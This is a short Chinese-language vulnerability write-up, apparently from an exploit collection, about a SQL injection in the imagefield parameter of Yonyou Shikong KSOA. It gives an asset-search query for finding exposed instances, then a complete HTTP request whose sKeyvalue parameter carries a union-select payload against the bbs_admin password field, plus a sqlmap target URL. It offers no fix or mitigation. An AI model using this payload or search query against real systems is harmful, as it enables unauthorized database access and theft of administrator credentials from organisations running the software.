用友时空KSOA imagefield参数存在SQL注入漏洞
一、漏洞简介
<font style="color:rgba(0, 0, 0, 0.9);">用友时空KSOA是建立在SOA理念指导下研发的新一代产品,是根据流通企业最前沿的I需求推出的统一的IT基础架构,它可以让流通企业各个时期建立的IT系统之间彼此轻松对话,帮助流通企业保护原有的IT投资,简化IT管理,提升竞争能力,确保企业整体的战略目标以及创新活动的实现。用友时空KSOA平台imagefield参数存在SQL注入漏洞。</font>
<font style="color:rgba(0, 0, 0, 0.9);">二、影响版本</font>
- 用友时空KSOA
三、资产测绘
- hunter
app.name="用友时空 KSOA"
- 登录页面
四、漏洞复现
GET /servlet/imagefield?key=readimage&sImgname=password&sTablename=bbs_admin&sKeyname=id&sKeyvalue=-1'+union+select+sys.fn_varbintohexstr(hashbytes('md5','test'))--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip, deflate
Connection: close
sqlmap
/servlet/imagefield?key=readimage&sImgname=password&sTablename=bbs_admin&sKeyname=id&sKeyvalue=1